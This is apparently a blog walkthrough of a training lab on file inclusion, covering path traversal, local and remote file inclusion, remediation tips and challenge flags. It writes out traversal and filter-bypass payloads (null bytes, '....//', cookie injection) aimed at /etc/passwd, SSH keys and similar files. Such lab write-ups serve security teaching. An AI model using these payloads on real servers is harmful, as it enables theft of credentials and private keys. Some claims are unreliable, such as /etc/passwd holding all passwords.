Learning Objectives:

  • Understand the detail of File Inclusion Vulnerabilities Occurence
  • Learn how to secure the system from a File Inclusion and remediate the system if this vulnerabilities found

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

This room consists of 8 tasks: 1. Introduction 2. Deploy the VM 3. Path Traversal 4. Local File Inclusion — LFI 5. Local File Inclusion — LFI Continued 6. Remote File Inclusion — RFI 7. Remediation 8. Challenge

I will walkthrough each room with my own answer method

===============================================================

  • Task 1: Introduction

This room will provide us the knowledge to exploit file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal. At the end we will also be given the practical exercise to feel the direct experience on File Inclusion.

None

Let's discuss a scenario where a user requests to access files from a webserver. For example, if a user wants to access and display their CV within the web application, the request may look as follows http://webapp.thm/get.php?file=userCV.pdf

None

If we are wondering…

Why do File Inclusion vulnerabilities happen??

This is mostly because PHP are poorly written and implemented, so that the user inputs are not sanitized or validated, and the user controls them

Q1) Let's continue to the next section to deploy the attached VM.

Answer: no answer needed

===============================================================

  • Task 2: Deploy the VM

As the title itself said, we are provided the VM to dive deeper about File Inclusion vulnerabilities, and the display will look like this after navigating to the link

None

Q1) Once you've deployed the VM, please wait a few minutes for the webserver to start, then progress to the next section!

Answer: No answer needed

===============================================================

  • Task 3: Path Traversal

Path traversal is a web security vulnerability that allows an attacker to read the OS resources, AKA Directory Traversal. This occurs when an attacker successfully manipulates the web app's URL to locate and access files or directories stored outside the application's root directory.

How to avoid this??

Because user's input is passed to a function such as file_get_contents in PHP, so…

First, we have to make sure that we validate and filter all inputs that might cause this vulnerability. For instance…

None

The image above shows that how a web app stores files in /var/www/app, and the user is requesting the CVs file on app directory.

The path traversal attacks means that the attacker takes advantage of movin the directory one step up using the command "../" → e.g. http://webapp.thm/get.php?file=../../../../etc/passwd

Suppose there are no input validation, the attacker could exploit it by using path traversal to access other sensitive information on that website.

There are some common OS files we could check on the Path Traversal checking, such as :

  • /etc/issue : contains a message to be printed before the login prompt
  • /etc/profile : controls system-wide default variables, like Filre creation mask, Terminal types, etc
  • /proc/version : specifies the version of Linux kernel
  • /etc/passwd : has all registered users' password
  • /etc/shadow : contains information of the system's users' pass
  • /root/.bash_history : contains the command history for root user
  • /var/mail/root : contains all emails for root user
  • /root/.ssh/id_rsa : contains private SSH keys for a user
  • /var/log/apache2/access.log : contains the accessed requests for Apache web server

Q1) What function causes path traversal vulnerabilities in PHP?

Answer: file_get_contents

===============================================================

  • Task 4: Local File Inclusion — LFI

LFI attacks against web applications are often due to a developers' lack of security awareness. Some PHP functions often contribute to vulnerable web applications, such as include, require, include_once, and require_once. Moreover, LFI can occur not only on PHP file, but also other languages, like ASP, JSP, etc.

In this task, we will be diving deeper on various LFI scenarios and how to exploit them

Scenario 1:

Suppose the web application provides two languages (EN, AR)

None

As we can see, the PHP code above uses a GET request via URL parameter "lang". And to load the English page, the call can be simply done like this : http://webapp.thm/index.php?lang=EN.php

Technically, if there is no input validation, we could simply read the /etc/passwd, which contains the SPII (sensitive information) about the users of the Linux OS.

Scenario 2:

In the following code, the developer decided to specify the directory inside the function as we can see on the image below…

None

the developer decided to use the include function to call PHP pages in the languages directory.

Again… if there is no input validation, we could manipulate the lang input with other OS-sensitive files

Now, after we learnt about the 2 scenarios above, let's apply this knowledge to answer several questions below

Q1) Give Lab #1 a try to read /etc/passwd. What would the request URI be?

None

Let's try to search "welcome.php" first to see if there's any difference in the URL

None

And yep, we can see the URL from /lab1.php to /lab1.php?file=welcome.php

Then we can change immediately to this: /lab1.php?file=/etc/passwd

None
we can see the information stored in /etc/passwd

Answer: /lab1.php?file=/etc/passwd

Q2) In Lab #2, what is the directory specified in the include function?

In this question, we need to enter the invalid command to see the error message

For instance, I search for "pwd"

None

And yep, we can see the included directory is includes

Answer: includes

===============================================================

  • Task 5: Local File Inclusion — LFI Continued

On the previous task, we have learned about the way to bypass the filter within the include function.

Now, we will learn the broadened one where we will be performing black box testing , in which we don't have the source code. In this case, errors are crucial to provide us more understanding how the data is passed and handled!

Scenario 3:

In this scenario, we have the entry point such as http://webapp.thm/index.php?lang=EN, then if we try entering an invalid input, such as THM, we will get the following error: Warning: include(languages/THM.php): failed to open stream: No such file or directory in /var/www/html/THM-4/index.php on line 12

This is a big hint, like the disclosure of include(languages/THM.php)

In addition, if we take a closer look, they are adding ".php" at the end of the file (THM → THM.php). Besides that, we could see that the error msg disclosed another important piece of information, such as the directory path /var/www/html/THM-4/, where we could use the path traversal method.

Scenario 4:

In this section, the developer decided to filter keywords to avoid disclosing sensitive information, where /etc/passwd is being filtered. However, we could try to add some methods that makes code look different but still has the same meaning. For instance, by using the NullByte %00 so actually the lang=/etc/passwd/ is the same thing like lang=/etc/passwd%00

We could also use this method, where we add "/." at the end (lang=/etc/passwd/ is the same like lang=/etc/passwd/.)

Scenario 5:

If we type this http://webapp.thm/index.php?lang=../../../../etc/passwd

we will get the following error: Warning: include(languages/etc/passwd): failed to open stream: No such file or directory in /var/www/html/THM-5/index.php on line 15

p.s.: pls pay attention to include(languages/etc/passwd)

which means the "../" has been replaced by an empty string. However, we could still do some manipulation to bypass this filter, such as ....//....//....//....//....//etc/passwd.

None

It is because the PHP filter only matches and replaces the first subset string of "../"

Now, after learning some scenarios above, hope we can apply this knowledge to answer some questions below!

Q1) Give Lab #3 a try to read /etc/passwd. What is the request look like?

Answer: /lab3.php?file=../../../../etc/passwd

Q2) Which function is causing the directory traversal in Lab #4?

None

We can simply enter any invalid command to cause an error

Answer: file_get_contents

Q3) Try out Lab #6 and check what is the directory that has to be in the input field?

None

Again, just enter the invalid command, and we can see the error message to analyse

Answer: THM-profile

Q4) Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

None

As we can see that we can only access files at THM-profile folder

However.. what we can realize is that the filter only detects the phrase "THM-profile" at the beginning of the input, that's why when we run this command THM-profile/../../../../etc/passwd, it workss!

None

And then, we can just simply run this command THM-profile/../../../../etc/os-release

None

And we got the answer!

Answer: 12.04

===============================================================

  • Task 6: Remote File Inclusion — RFI

Remote File Inclusion is a technique to include remote files into a vulnerable application. This is also caused by the same reason like LFI, such as improperly user input sanitization. However, to make RFI happening, we need to ensure the allow_url_fopen option needs to be on.

Other impacts that may be caused by RFI is the RCE (Remote Command Execution) executed by attacker on the server.

On the image below, we could see some RFI steps

None

Firstly, let's say the attacker injects the malicious URL, which points to the attacker's server. If there is no input validation, then the malicious URL passes into the include function. Ultimately, the web app server will send a GET request to the malicious server to fetch the file and the remote file will be included on that web server.

Q1) We showed how to include PHP pages via RFI. Do research on how to get remote command execution (RCE), and answer the question in the challenge section.

Answer: no answer needed

===============================================================

  • Task 7: Remediation

As a Blue Team specialist, it is really crucial to be aware of web app vulnerabilities, including the way to find them, solve them, and do recovery from their bad impact. Here are some suggestions we could take to add on our knowlede:

  • Keep system and services always up-to-date to the latest version
  • Shut the PHP errors down to avoid leaking of any exploitable spots
  • Implement the WAF (Web Application Firewall)
  • Disable some PHP features that will cause file inclusion vulnerabilities (if not needed)
  • Monitor the web application regularly and do some kind of maintenance
  • Implement Zero Trust architecture, which means always validate user inputs and never trust

Q1) Ready for the challenges?

Answer: no answer needed

===============================================================

  • Task 8: Challenge

Now, it's the time for doing the challenge, as we are provided the VM and required to do some "CTF" thing! Let's go!

None

Q1) Capture Flag1 at /etc/flag1

first, we need to run the browser in BurpSuite and activate the intercept

None

As we can see, the current request method is still GET, and we need to change it to POST by right-click anywhere and click Change request method

None

And yep, the interface will be like this

None

Now, what we need to do is to use the POST request method to read /etc/flag1

None

And yep, we successfully got the flag

Answer: F1x3d-iNpu7-f0rrn

Q2) Capture Flag2 at /etc/flag2

None

The display is like above because the Cookie of THM still set to Guest

None

So we have to change to Admin then…

None

And yep, as we can see, now we are Admin!

However, if we take a closer look on the error message

None

first, "includes/Admin.php", where "Admin" obviously is taken from the cookie. Besides that, the statement "No such file or directory in /var/www/html/chall2.php" give us a big clue…

What if we change the cookie into "../../../../etc/flag2%00", where "%00" is to ignore the ".php" at the end

None
None

And yep, we successfully got the flag!

Answer: c00k13_i5_yuMmy1

Q3) Capture Flag3 at /etc/flag3

None

When I tried to input the dot (.), slash (/) , or percentage (%), they are always getting filtered, as a result, after those being removed, the remaining one is only the alphabets

None

However, as we intercepted through Burp Suite, we could find that when changing into POST method, the filter is no longer working

None

Again, we need to change the request method first, then FORWARD it

None

And yep, we successfully got the flag!

Answer: P0st_1s_w0rk1in9

Q4) Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

None

At first, the interface will be like this. This is interesting because we have the opportunity to apply our knowledge on RFI execution.

When I searched for gg.php file, the interface will be like this…

None

Where we also get that there is no further filtering, observed from File Content Preview of gg.php , as well as we get the info of the current path.

Now, since there are 3 directories before finding the .php file, we have to do dot-dot-slash 3 times to go back to the parent directory, prior to /etc/hostname → ../../../etc/hostname

None

And yep, we successfully revealed the content of hostname execution!

Answer: lfi-vm-thm-f8c5b1a78692

===============================================================